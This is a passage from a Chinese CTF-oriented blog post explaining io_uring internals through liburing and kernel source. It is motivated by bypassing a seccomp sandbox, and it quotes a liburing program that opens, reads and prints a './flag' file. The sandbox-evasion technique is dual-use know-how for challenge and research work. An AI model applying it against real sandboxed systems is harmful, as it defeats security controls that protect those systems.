Linux.io_uring-Top-down-Approach
2024-03-05 08:46:36 # CTF

最近在N1线下赛遇见一个seccomp沙箱,限制了只能使用 io_uring_setup 一个系统调用,之前不久的ACTF中, 使用mmapio_uring_setupio_uring_enter 三个系统调用,完成了orw。 如何仅仅使用 io_uring_setup 完成orw呢?

本文将不仅仅局限于CTF,而是从io_uring的实现出发,先从宏观角度透视io_uring的实现框架, 然后以源代码为基础,自顶向下,从liburing,到内核io_uring的用户态接口, 最后到io_uring的内核实现,一步步聚焦 io_uring 具体的实现。

由于笔者的研究方向的是二进制安全,因此笔者将更多关注 io_uring 中用户和内核态的通信这一容易产生安全漏洞的模块,而不会聚焦io_uring的异步调度和任务处理,以上。

overview

在开始前,首先介绍一下什么是io_uring

io_uring 是 Linux 5.1 引入的一套新的异步 I/O 接口机制,主要有以下特点:

  1. 高效 - 通过共享内存和锁自由的接口设计大大降低了系统调用开销。
  2. 灵活 - 支持阻塞,非阻塞,轮询多种调用方式,可以同时提交多个 I/O 请求并通过轮询或异步方式得到完成通知。
  3. 通用 - 支持文件,网络,时间,引用计数等多种 I/O,统一了异步 I/O 接口。

io_uring 主要由提交队列(SQ)、完成队列(CQ)、SQEs 请求和 CQEs 结果组成。

其中SQE和CQE 分别是SQ和CQ中的一个实体。

应用通过mmap映射SQ和CQ,向SQ提交I/O请求,再通过读CQ获取I/O完成结果。这避免了大量的 context switch 和系统调用开销。

这里以ACTF星盟的师傅写的liburing实现orw的一个小例子来介绍一下io_uring 的工作原理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
// ref from https://blog.xmcve.com/2023/10/31/ACTF-2023-Writeup/#title-9

#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <liburing.h>
#include <unistd.h>
#include <syscall.h>
#include <sys/prctl.h>

#define QUEUE_DEPTH 1

int main() {
struct io_uring ring = {0};
struct io_uring_sqe *sqe;
struct io_uring_cqe *cqe;
int fd, ret;
char buffer[4096] = {0};

if (io_uring_queue_init(QUEUE_DEPTH, &ring, 0) < 0) {
perror("io_uring_queue_init");
return 1;
}

// 准备打开操作
sqe = io_uring_get_sqe(&ring);
if (!sqe) {
fprintf(stderr, "Failed to get SQE\n");
return 1;
}

int dirfd = AT_FDCWD; // 当前工作目录的文件描述符
const char *pathname = "./flag";
int flags = O_RDONLY;

io_uring_prep_openat(sqe, dirfd, pathname, flags, 0);
io_uring_sqe_set_data(sqe, NULL);

// 提交请求
ret = io_uring_submit(&ring);
if (ret < 0) {
perror("io_uring_submit");
return 1;
}

// 等待完成
ret = io_uring_wait_cqe(&ring, &cqe);
if (ret < 0) {
perror("io_uring_wait_cqe");
return 1;
}

// 处理完成的请求
if (cqe->res < 0) {
fprintf(stderr, "Open error: %d\n", cqe->res);
return 1;
}

fd = cqe->res; // 获取打开的文件描述符

// 准备读取操作
sqe = io_uring_get_sqe(&ring);
if (!sqe) {
fprintf(stderr, "Failed to get SQE\n");
return 1;
}

io_uring_prep_read(sqe, fd, buffer, sizeof(buffer), 0);
io_uring_sqe_set_data(sqe, NULL);

// 提交请求
ret = io_uring_submit(&ring);
if (ret < 0) {
perror("io_uring_submit");
return 1;
}

// 等待完成
ret = io_uring_wait_cqe(&ring, &cqe);
if (ret < 0) {
perror("io_uring_wait_cqe");
return 1;
}

// 处理完成的请求
if (cqe->res < 0) {
fprintf(stderr, "Read error: %d\n", cqe->res);
return 1;
}

// 准备写操作
sqe = io_uring_get_sqe(&ring);
if (!sqe) {
fprintf(stderr, "Failed to get SQE\n");
return 1;
}

io_uring_prep_write(sqe, 1, buffer, strlen(buffer), 0);
io_uring_sqe_set_data(sqe, NULL);

// 提交请求
ret = io_uring_submit(&ring);
if (ret < 0) {
perror("io_uring_submit");
return 1;
}

// 等待完成
ret = io_uring_wait_cqe(&ring, &cqe);
if (ret < 0) {
perror("io_uring_wait_cqe");
return 1;
}

// 处理完成的请求
if (cqe->res < 0) {
fprintf(stderr, "Read error: %d\n", cqe->res);
return 1;
}

// printf("Read %d bytes: %s\n", cqe->res, buffer);

// 清理并关闭文件
io_uring_cqe_seen(&ring, cqe);
io_uring_queue_exit(&ring);
close(fd);
sleep(1);

return 0;
}

可以看到,如果要使用io_uring会经历如下流程:

首先通过 io_uring_queue_init 完成了初始化,io_uring的sq和cq队列也被创建

在库内部实际上是使用 io_uring_setupmmap 两个syscall实现

前者完成了内核中相应结构体和资源的创建,后者将两个队列映射到用户态内存,通过共享内存方便用户态访问

1
2
3
4
if (io_uring_queue_init(QUEUE_DEPTH, &ring, 0) < 0) {
perror("io_uring_queue_init");
return 1;
}

然后,用户使用 io_uring_get_sqe 得到一个sqe,(SQ队列中的一个实体) ,并根据所要完成的任务,设置sqe的各个成员, 这个过程是完全在用户态完成的

1
2
3
4
5
6
7
8
9
10
11
12
sqe = io_uring_get_sqe(&ring);
if (!sqe) {
fprintf(stderr, "Failed to get SQE\n");
return 1;
}

int dirfd = AT_FDCWD; // 当前工作目录的文件描述符
const char *pathname = "./flag";
int flags = O_RDONLY;

io_uring_prep_openat(sqe, dirfd, pathname, flags, 0);
io_uring_sqe_set_data(sqe, NULL);

最后,通过 io_uring_submit 提交了请求,库内部实际上是调用了 io_uring_enter

1
ret = io_uring_submit(&ring);

io_uring任务收割模式

这里主要解释一下 IORING_SETUP_SQPOLLIORING_SETUP_IOPOLL 的区别

IORING_SETUP_SQPOLL
When this flag is specified, a kernel thread is created to
perform submission queue polling. An io_uring instance
configured in this way enables an application to issue I/O
without ever context switching into the kernel. By using
the submission queue to fill in new submission queue
entries and watching for completions on the completion
queue, the application can submit and reap I/Os without
doing a single system call.
If the kernel thread is idle for more than sq_thread_idle
milliseconds, it will set the IORING_SQ_NEED_WAKEUP bit in
the flags field of the struct io_sq_ring. When this
happens, the application must call io_uring_enter(2) to
wake the kernel thread. If I/O is kept busy, the kernel
thread will never sleep. An application making use of
this feature will need to guard the io_uring_enter(2) call
with the following code sequence:
/*
* Ensure that the wakeup flag is read after the tail pointer
* has been written. It’s important to use memory load acquire
* semantics for the flags read, as otherwise the application
* and the kernel might not agree on the consistency of the
* wakeup flag.
*/
unsigned flags = atomic_load_relaxed(sq_ring->flags);
if (flags & IORING_SQ_NEED_WAKEUP)
io_uring_enter(fd, 0, 0, IORING_ENTER_SQ_WAKEUP);

IORING_SETUP_IOPOLL
Perform busy-waiting for an I/O completion, as opposed to
getting notifications via an asynchronous IRQ (Interrupt
Request). The file system (if any) and block device must
support polling in order for this to work. Busy-waiting
provides lower latency, but may consume more CPU resources
than interrupt driven I/O. Currently, this feature is
usable only on a file descriptor opened using the O_DIRECT
flag. When a read or write is submitted to a polled
context, the application must poll for completions on the
CQ ring by calling io_uring_enter(2). It is illegal to
mix and match polled and non-polled I/O on an io_uring
instance.
This is only applicable for storage devices for now, and
the storage device must be configured for polling. How to
do that depends on the device type in question. For NVMe
devices, the nvme driver must be loaded with the
poll_queues parameter set to the desired number of polling
queues. The polling queues will be shared appropriately
between the CPUs in the system, if the number is less than
the number of online CPU threads.

即,SQPOLL 通过内核线程定时唤醒来收割任务
IOPOLL 通过 io_uring_enter 通知内核来收割任务

struct

其次,需要在讲解前,介绍一下 liburing 和 内核暴露出的一些结构体:

liburing

首先是 io_uring 这是liburing 关于io_uring的核心管理结构体

1
2
3
4
5
6
7
8
9
10
11
12
13
struct io_uring {
struct io_uring_sq sq; // sq 管理结构体
struct io_uring_cq cq; // cq 管理结构体
unsigned flags; // setup时的flag设置
// 以下setup返回时写入params的一些信息
int ring_fd;
unsigned features;
int enter_ring_fd;
__u8 int_flags;
__u8 pad[3];
unsigned pad2;
};

io_uring_sq, sq的管理结构体, 这个结构体在6.5及以下的版本可以在内核中找到,在6.5以上的版本在内核中删除了,6.5以上存在io_rings,相当于io_uring_sq和io_uring_cq 的组合

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
struct io_uring_sq {
unsigned *khead;
unsigned *ktail;
// Deprecated: use `ring_mask` instead of `*kring_mask`
unsigned *kring_mask;
// Deprecated: use `ring_entries` instead of `*kring_entries`
unsigned *kring_entries;
unsigned *kflags;
unsigned *kdropped;
unsigned *array;
struct io_uring_sqe *sqes;

unsigned sqe_head;
unsigned sqe_tail;

size_t ring_sz;
void *ring_ptr;

unsigned ring_mask;
unsigned ring_entries;

unsigned pad[2];
};

在此着重解释一下ring_ptr和 sqes两个成员:
这两个成员,在没有设置NO_MMAP的情况下,都是由 io_uring_setup 后用mmap映射得到的。

ring_prt指向一连串内核用来处理io_uring时的信息,例如当前循环队列head和tail, io_uring_setup 返回时会设置 io_uring_params 中的 sq_off 结构,这个结构就记录了各个成员信息,相对于ring_ptr的偏移, 最后在 [[#io_uring_setup_ring_pointers]] 中设置相关变量指向和内核共享的内存区域中对应的偏移。

而sqes,就是真正的共享队列的区域

类似的,存在io_uring_cq 结构体

kernel

首先是io_uring_params

他是io_uring_setup 传入的参数,同时,返回时,kernel会给此结构体相应成员赋值.

此结构体也是提供给用户态的API

1
2
3
4
5
6
7
8
9
10
11
12
13
struct io_uring_params {
__u32 sq_entries;
__u32 cq_entries;
__u32 flags;
__u32 sq_thread_cpu; // 内核任务处理线程占用的cpu
__u32 sq_thread_idle; // 内核任务处理线程最大闲置时间,
// 见`IORING_SETUP_SQPOLL`
__u32 features;
__u32 wq_fd;
__u32 resv[3];
struct io_sqring_offsets sq_off;
struct io_cqring_offsets cq_off;
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
struct io_uring_sqe {
__u8 opcode; /* type of operation for this sqe */
__u8 flags; /* IOSQE_ flags */
__u16 ioprio; /* ioprio for the request */
__s32 fd; /* file descriptor to do IO on */
union {
__u64 off; /* offset into file */
__u64 addr2;
struct {
__u32 cmd_op;
__u32 __pad1;
};
};
union {
__u64 addr; /* pointer to buffer or iovecs */
__u64 splice_off_in;
};
__u32 len; /* buffer size or number of iovecs */
union {
__kernel_rwf_t rw_flags;
__u32 fsync_flags;
__u16 poll_events; /* compatibility */
__u32 poll32_events; /* word-reversed for BE */
__u32 sync_range_flags;
__u32 msg_flags;
__u32 timeout_flags;
__u32 accept_flags;
__u32 cancel_flags;
__u32 open_flags;
__u32 statx_flags;
__u32 fadvise_advice;
__u32 splice_flags;
__u32 rename_flags;
__u32 unlink_flags;
__u32 hardlink_flags;
__u32 xattr_flags;
__u32 msg_ring_flags;
__u32 uring_cmd_flags;
};
__u64 user_data; /* data to be passed back at completion time */
/* pack this to avoid bogus arm OABI complaints */
union {
/* index into fixed buffers, if used */
__u16 buf_index;
/* for grouped buffer selection */
__u16 buf_group;
} __attribute__((packed));
/* personality to use, if used */
__u16 personality;
union {
__s32 splice_fd_in;
__u32 file_index;
struct {
__u16 addr_len;
__u16 __pad3[1];
};
};
union {
struct {
__u64 addr3;
__u64 __pad2[1];
};
/*
* If the ring is initialized with IORING_SETUP_SQE128, then
* this field is used for 80 bytes of arbitrary command data
*/
__u8 cmd[0];
};
};

io_uring_sqe , 用来表征一个IO任务的sqe, 通过在sqes 环形队列上插入此结构体, 实现内核任务的提交. 其中大部分参数都是提交给相应的任务处理函数的参数.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
struct io_uring_sqe {
__u8 opcode; // 任务的类型, 用一系列枚举变量来表示
__u8 flags; // 任务的一些标志位, 可以设置任务的一些特性
__u16 ioprio; /* ioprio for the request */
__s32 fd; /* file descriptor to do IO on */
union {
__u64 off; /* offset into file */
__u64 addr2;
struct {
__u32 cmd_op;
__u32 __pad1;
};
};
union {
__u64 addr; /* pointer to buffer or iovecs */
__u64 splice_off_in;
};
__u32 len; /* buffer size or number of iovecs */
union {
__kernel_rwf_t rw_flags;
__u32 fsync_flags;
__u16 poll_events; /* compatibility */
__u32 poll32_events; /* word-reversed for BE */
__u32 sync_range_flags;
__u32 msg_flags;
__u32 timeout_flags;
__u32 accept_flags;
__u32 cancel_flags;
__u32 open_flags;
__u32 statx_flags;
__u32 fadvise_advice;
__u32 splice_flags;
__u32 rename_flags;
__u32 unlink_flags;
__u32 hardlink_flags;
__u32 xattr_flags;
__u32 msg_ring_flags;
__u32 uring_cmd_flags;
};
__u64 user_data; /* data to be passed back at completion time */
/* pack this to avoid bogus arm OABI complaints */
union {
/* index into fixed buffers, if used */
__u16 buf_index;
/* for grouped buffer selection */
__u16 buf_group;
} __attribute__((packed));
/* personality to use, if used */
__u16 personality;
union {
__s32 splice_fd_in;
__u32 file_index;
struct {
__u16 addr_len;
__u16 __pad3[1];
};
};
union {
struct {
__u64 addr3;
__u64 __pad2[1];
};
/*
* If the ring is initialized with IORING_SETUP_SQE128, then
* this field is used for 80 bytes of arbitrary command data
*/
__u8 cmd[0];
};
};

io_ring_ctx 是kernel io_uring运行的上下文,记录了io_uring 运行时需要保存的一些信息,这里就不一一分析每个成员了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
struct io_ring_ctx {
/* const or read-mostly hot data */
struct {
unsigned int flags;
unsigned int drain_next: 1;
unsigned int restricted: 1;
unsigned int off_timeout_used: 1;
unsigned int drain_active: 1;
unsigned int has_evfd: 1;
/* all CQEs should be posted only by the submitter task */
unsigned int task_complete: 1;
unsigned int lockless_cq: 1;
unsigned int syscall_iopoll: 1;
unsigned int poll_activated: 1;
unsigned int drain_disabled: 1;
unsigned int compat: 1;

struct task_struct *submitter_task;
struct io_rings *rings;
struct percpu_ref refs;

enum task_work_notify_mode notify_method;
} ____cacheline_aligned_in_smp;

/* submission data */
struct {
struct mutex uring_lock;

/*
* Ring buffer of indices into array of io_uring_sqe, which is
* mmapped by the application using the IORING_OFF_SQES offset.
*
* This indirection could e.g. be used to assign fixed
* io_uring_sqe entries to operations and only submit them to
* the queue when needed.
*
* The kernel modifies neither the indices array nor the entries
* array.
*/
u32 *sq_array;
struct io_uring_sqe *sq_sqes;
unsigned cached_sq_head;
unsigned sq_entries;

/*
* Fixed resources fast path, should be accessed only under
* uring_lock, and updated through io_uring_register(2)
*/
struct io_rsrc_node *rsrc_node;
atomic_t cancel_seq;
struct io_file_table file_table;
unsigned nr_user_files;
unsigned nr_user_bufs;
struct io_mapped_ubuf **user_bufs;

struct io_submit_state submit_state;

struct io_buffer_list *io_bl;
struct xarray io_bl_xa;

struct io_hash_table cancel_table_locked;
struct io_alloc_cache apoll_cache;
struct io_alloc_cache netmsg_cache;

/*
* ->iopoll_list is protected by the ctx->uring_lock for
* io_uring instances that don't use IORING_SETUP_SQPOLL.
* For SQPOLL, only the single threaded io_sq_thread() will
* manipulate the list, hence no extra locking is needed there.
*/
struct io_wq_work_list iopoll_list;
bool poll_multi_queue;
} ____cacheline_aligned_in_smp;

struct {
/*
* We cache a range of free CQEs we can use, once exhausted it
* should go through a slower range setup, see __io_get_cqe()
*/
struct io_uring_cqe *cqe_cached;
struct io_uring_cqe *cqe_sentinel;

unsigned cached_cq_tail;
unsigned cq_entries;
struct io_ev_fd __rcu *io_ev_fd;
unsigned cq_extra;
} ____cacheline_aligned_in_smp;

/*
* task_work and async notification delivery cacheline. Expected to
* regularly bounce b/w CPUs.
*/
struct {
struct llist_head work_llist;
unsigned long check_cq;
atomic_t cq_wait_nr;
atomic_t cq_timeouts;
struct wait_queue_head cq_wait;
} ____cacheline_aligned_in_smp;

/* timeouts */
struct {
spinlock_t timeout_lock;
struct list_head timeout_list;
struct list_head ltimeout_list;
unsigned cq_last_tm_flush;
} ____cacheline_aligned_in_smp;

struct io_uring_cqe completion_cqes[16];

spinlock_t completion_lock;

/* IRQ completion list, under ->completion_lock */
struct io_wq_work_list locked_free_list;
unsigned int locked_free_nr;

struct list_head io_buffers_comp;
struct list_head cq_overflow_list;
struct io_hash_table cancel_table;

const struct cred *sq_creds; /* cred used for __io_sq_thread() */
struct io_sq_data *sq_data; /* if using sq thread polling */

struct wait_queue_head sqo_sq_wait;
struct list_head sqd_list;

unsigned int file_alloc_start;
unsigned int file_alloc_end;

struct xarray personalities;
u32 pers_next;

struct list_head io_buffers_cache;

/* Keep this last, we don't need it for the fast path */
struct wait_queue_head poll_wq;
struct io_restriction restrictions;

/* slow path rsrc auxilary data, used by update/register */
struct io_mapped_ubuf *dummy_ubuf;
struct io_rsrc_data *file_data;
struct io_rsrc_data *buf_data;

/* protected by ->uring_lock */
struct list_head rsrc_ref_list;
struct io_alloc_cache rsrc_node_cache;
struct wait_queue_head rsrc_quiesce_wq;
unsigned rsrc_quiesce;

struct list_head io_buffers_pages;

#if defined(CONFIG_UNIX)
struct socket *ring_sock;
#endif
/* hashed buffered write serialization */
struct io_wq_hash *hash_map;

/* Only used for accounting purposes */
struct user_struct *user;
struct mm_struct *mm_account;

/* ctx exit and cancelation */
struct llist_head fallback_llist;
struct delayed_work fallback_work;
struct work_struct exit_work;
struct list_head tctx_list;
struct completion ref_comp;

/* io-wq management, e.g. thread count */
u32 iowq_limits[2];
bool iowq_limits_set;

struct callback_head poll_wq_task_work;
struct list_head defer_list;
unsigned sq_thread_idle;
/* protected by ->completion_lock */
unsigned evfd_last_cq_tail;

/*
* If IORING_SETUP_NO_MMAP is used, then the below holds
* the gup'ed pages for the two rings, and the sqes.
*/
unsigned short n_ring_pages;
unsigned short n_sqe_pages;
struct page **ring_pages;
struct page **sqe_pages;
};

liburing

liburing 提供的核心接口有如下函数:

  • io_uring_queue_init io_uring的初始化结构,用来初始化一个 io_uring 结构体
  • io_uring_prep_xxx 用来创建一个任务
  • io_uring_submit 用来提交一个任务

io_uring_queue_init

参数:

  • entries: sq队列大小
  • rings: io_uring 结构体, liburing提供给用户态的管理结构
  • flags: 传递给 io_uring_setupparams 中的 flag, 用来控制创建的io_uring的特性, 详情可以看 io_uring_set_up
    返回值:
  • fd: 用来mmap的fd
1
2
3
4
5
6
7
8
9
10
__cold int io_uring_queue_init(unsigned entries, struct io_uring *ring,
unsigned flags)
{
struct io_uring_params p;

memset(&p, 0, sizeof(p));
p.flags = flags;

return io_uring_queue_init_params(entries, ring, &p);
}

接下来是一系列调用链:

1
2
3
4
-->io_uring_queue_init
-->io_uring_queue_init_params
-->io_uring_queue_init_try_nosqarr
-->__io_uring_queue_init_params

最后到 __io_uring_queue_init_params

其中 p 是要传递给 io_uring_setup 的params, buf 的使用将在后面分析.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
int __io_uring_queue_init_params(unsigned entries, struct io_uring *ring,
struct io_uring_params *p, void *buf,
size_t buf_size)
{
int fd, ret = 0;
unsigned *sq_array;
unsigned sq_entries, index;

memset(ring, 0, sizeof(*ring));

/*
* The kernel does this check already, but checking it here allows us
* to avoid handling it below.
*/
if (p->flags & IORING_SETUP_REGISTERED_FD_ONLY
&& !(p->flags & IORING_SETUP_NO_MMAP))
return -EINVAL;
// 如果设置了REGISTERED_FD_ONLY 就必须要设置 NO_MMAP

对于设置了NO_MMAP的请求,通过 io_uring_alloc_huge 进行了预处理,这个函数我们将在之后[[#io_uring_alloc_huge]]进行分析

1
2
3
4
5
6
7
8
9
if (p->flags & IORING_SETUP_NO_MMAP) {
ret = io_uring_alloc_huge(entries, p, &ring->sq, &ring->cq,
buf, buf_size);
if (ret < 0)
return ret;
if (buf)
ring->int_flags |= INT_FLAG_APP_MEM;
}
// 如果设置了NO_MMAP,就要预先分配大内存

接下来就是调用io_uring_setup 完成真正的初始化操作了。

1
2
3
4
5
6
7
8
9
10
11
fd = __sys_io_uring_setup(entries, p);
// syscall(__NR_io_uring_setup, entries, p)
if (fd < 0) {
if ((p->flags & IORING_SETUP_NO_MMAP) &&
!(ring->int_flags & INT_FLAG_APP_MEM)) {
__sys_munmap(ring->sq.sqes, 1);
io_uring_unmap_rings(&ring->sq, &ring->cq);
}
return fd;
}
// 错误处理

对于没有设置 NO_MMAP 的情形,需要在此时mmap为sq和cq在用户态映射内存[[#io_uring_queue_mmap]],反之,直接设置ring相关指针[[#io_uring_setup_ring_pointers]]

1
2
3
4
5
6
7
8
9
if (!(p->flags & IORING_SETUP_NO_MMAP)) {
ret = io_uring_queue_mmap(fd, p, ring);
if (ret) {
__sys_close(fd);
return ret;
}
} else {
io_uring_setup_ring_pointers(p, &ring->sq, &ring->cq);
}

之后,是将io_uring_setup 设置在 params 中的各种变量复制到用户态管理结构体ring中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
	sq_entries = ring->sq.ring_entries;

if (!(p->flags & IORING_SETUP_NO_SQARRAY)) {
sq_array = ring->sq.array;
for (index = 0; index < sq_entries; index++)
sq_array[index] = index;
}
ring->features = p->features;
// io_uring 的 特性
ring->flags = p->flags;
// io_uring 设置的标志
ring->enter_ring_fd = fd;
// 返回的fd
if (p->flags & IORING_SETUP_REGISTERED_FD_ONLY) {
ring->ring_fd = -1;
ring->int_flags |= INT_FLAG_REG_RING | INT_FLAG_REG_REG_RING;
} else {
ring->ring_fd = fd;
}

return ret;
}

io_uring_alloc_huge

io_uring_alloc_huge 是对于设置了NO_MMAP的程序,预先在用户态设置好SQ和CQ的内存的函数

首先是会用到的各种参数和变量

1
2
3
4
5
6
7
8
9
10
11
static int io_uring_alloc_huge(unsigned entries, struct io_uring_params *p,
struct io_uring_sq *sq, struct io_uring_cq *cq,
void *buf, size_t buf_size)
{
unsigned long page_size = get_page_size();
unsigned sq_entries, cq_entries;
size_t ring_mem, sqes_mem;
unsigned long mem_used = 0;
void *ptr;
int ret;

接下来是首先确定了sq和eq entrie的数量。这里具体的算法就不在这里分析了,主要包括合法性检查和幂2向上取整的运算等。

1
2
3
ret = get_sq_cq_entries(entries, p, &sq_entries, &cq_entries);
if (ret)
return ret;

接下来就是计算sq和cq需要的内存大小了,计算过程非常直观,笔者就不赘述了:

1
2
3
4
5
6
7
8
9
sqes_mem = sq_entries * sizeof(struct io_uring_sqe);
sqes_mem = (sqes_mem + page_size - 1) & ~(page_size - 1);
ring_mem = cq_entries * sizeof(struct io_uring_cqe);
if (p->flags & IORING_SETUP_CQE32)
ring_mem *= 2;
if (!(p->flags & IORING_SETUP_NO_SQARRAY))
ring_mem += sq_entries * sizeof(unsigned);
mem_used = sqes_mem + ring_mem;
mem_used = (mem_used + page_size - 1) & ~(page_size - 1);

接下来,就是真正决定sq和cq的用户态地址了。

首先,如果用户传入了buf,并且buf_size足够大, 那么就设置为用户buf

否则,就mmap出一片内存来使用(根据size计算的不同可能是4K也可能是4M,分别是一页和一个大页(二级页表对应的大小))

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
if (!buf && (sqes_mem > huge_page_size || ring_mem > huge_page_size))
return -ENOMEM;

if (buf) {
if (mem_used > buf_size)
return -ENOMEM;
ptr = buf;
} else {
int map_hugetlb = 0;
if (sqes_mem <= page_size)
buf_size = page_size;
else {
buf_size = huge_page_size;
map_hugetlb = MAP_HUGETLB;
}
ptr = __sys_mmap(NULL, buf_size, PROT_READ|PROT_WRITE,
MAP_SHARED|MAP_ANONYMOUS|map_hugetlb,
-1, 0);
if (IS_ERR(ptr))
return PTR_ERR(ptr);
}
sq->sqes = ptr;

并以类似的方式设置了sq->ring_ptr

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

if (mem_used <= buf_size)
{
sq->ring_ptr = (void *)sq->sqes + sqes_mem;
/* clear ring sizes, we have just one mmap() to undo */
cq->ring_sz = 0;
sq->ring_sz = 0;
}
else
{
int map_hugetlb = 0;
if (ring_mem <= page_size)
buf_size = page_size;
else
{
buf_size = huge_page_size;
map_hugetlb = MAP_HUGETLB;
}
ptr = __sys_mmap(NULL, buf_size, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_ANONYMOUS | map_hugetlb,
-1, 0);
if (IS_ERR(ptr))
{
__sys_munmap(sq->sqes, 1);
return PTR_ERR(ptr);
}
sq->ring_ptr = ptr;
sq->ring_sz = buf_size;
cq->ring_sz = 0;
}

不过下面一部分就是真正重要的了:

p正是传入 io_uring_setup 的结构体,所以对p的赋值才是至关重要的,这里的sq和cq不过是 liburing 暴露给用户的管理结构 io_uring 中的一个成员

1
2
3
4
cq->ring_ptr = (void *)sq->ring_ptr;
p->sq_off.user_addr = (unsigned long)sq->sqes;
p->cq_off.user_addr = (unsigned long)sq->ring_ptr;
return (int)mem_used;

所以规根结底就是写入了 p的 sq_off 和 cq_off

io_uring_queue_mmap

这是对于没有设置NO_MMAP的情形下,完成了 syscall io_uring_setup 处理后,mmap的流程

1
2
3
4
5
6
__cold int io_uring_queue_mmap(int fd, struct io_uring_params *p,
struct io_uring *ring)
{
memset(ring, 0, sizeof(*ring));
return io_uring_mmap(fd, p, &ring->sq, &ring->cq);
}

首先是计算了sq和cq的ring的size

1
2
3
4
5
6
7
8
9
10
11
12
static int io_uring_mmap(int fd, struct io_uring_params *p,
struct io_uring_sq *sq, struct io_uring_cq *cq)
{
size_t size;
int ret;

size = sizeof(struct io_uring_cqe);
if (p->flags & IORING_SETUP_CQE32)
size += sizeof(struct io_uring_cqe);

sq->ring_sz = p->sq_off.array + p->sq_entries * sizeof(unsigned);
cq->ring_sz = p->cq_off.cqes + p->cq_entries * size;

然后开始mmap sq 和 cq ring的指针:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
if (p->features & IORING_FEAT_SINGLE_MMAP)
{
if (cq->ring_sz > sq->ring_sz)
sq->ring_sz = cq->ring_sz;
cq->ring_sz = sq->ring_sz;
}
sq->ring_ptr = __sys_mmap(0, sq->ring_sz, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_POPULATE, fd,
IORING_OFF_SQ_RING);// offset = 0
if (IS_ERR(sq->ring_ptr))
return PTR_ERR(sq->ring_ptr);

if (p->features & IORING_FEAT_SINGLE_MMAP)
{
cq->ring_ptr = sq->ring_ptr;
}
else
{
cq->ring_ptr = __sys_mmap(0, cq->ring_sz, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_POPULATE, fd,
IORING_OFF_CQ_RING);
// offset = 8000000
if (IS_ERR(cq->ring_ptr))
{
ret = PTR_ERR(cq->ring_ptr);
cq->ring_ptr = NULL;
goto err;
}
}

如果设置了 IORING_FEAT_SINGLE_MMAP ,就可以将sq 和 cq的ring一起mmap,否则,就分别单独mmap

最后再mmap sq的sqes

1
2
3
4
5
6
7
8
9
10
11
12
13
size = sizeof(struct io_uring_sqe);
if (p->flags & IORING_SETUP_SQE128)
size += 64;
sq->sqes = __sys_mmap(0, size * p->sq_entries, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_POPULATE, fd, IORING_OFF_SQES);
if (IS_ERR(sq->sqes))
{
ret = PTR_ERR(sq->sqes);
err:
io_uring_unmap_rings(sq, cq);
return ret;
}

最后的最后,设置相关指针 [[#io_uring_setup_ring_pointers]]

1
io_uring_setup_ring_pointers(p, sq, cq);

io_uring_setup_ring_pointers

此函数用来设置 struct io_uring ring 也就是liburing的核心管理结构体.

我们知道 sq->ring_ptr 在 kernel被映射到一个内核结构体, 其中结构体各个成员的偏移通过 io_uring_params 的两个 offset 成员结构体返回, 这里通过此拿到结构体对应成员的指针, 并赋值给 sqcq 的各个成员, 这里的 sqcq 又是 管理结构体 ring 的成员

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
static void io_uring_setup_ring_pointers(struct io_uring_params *p,
struct io_uring_sq *sq,
struct io_uring_cq *cq)
{
sq->khead = sq->ring_ptr + p->sq_off.head;
// 设置sq head的指针
sq->ktail = sq->ring_ptr + p->sq_off.tail;
// 设置sq tail指针
sq->kring_mask = sq->ring_ptr + p->sq_off.ring_mask;
sq->kring_entries = sq->ring_ptr + p->sq_off.ring_entries;
// 设置sq entries个数
sq->kflags = sq->ring_ptr + p->sq_off.flags;
// 设置对应标志
sq->kdropped = sq->ring_ptr + p->sq_off.dropped;
if (!(p->flags & IORING_SETUP_NO_SQARRAY))
sq->array = sq->ring_ptr + p->sq_off.array;
// 如果存在sqarray
cq->khead = cq->ring_ptr + p->cq_off.head;
// 设置cq head指针
cq->ktail = cq->ring_ptr + p->cq_off.tail;
// 设置cq tail指针
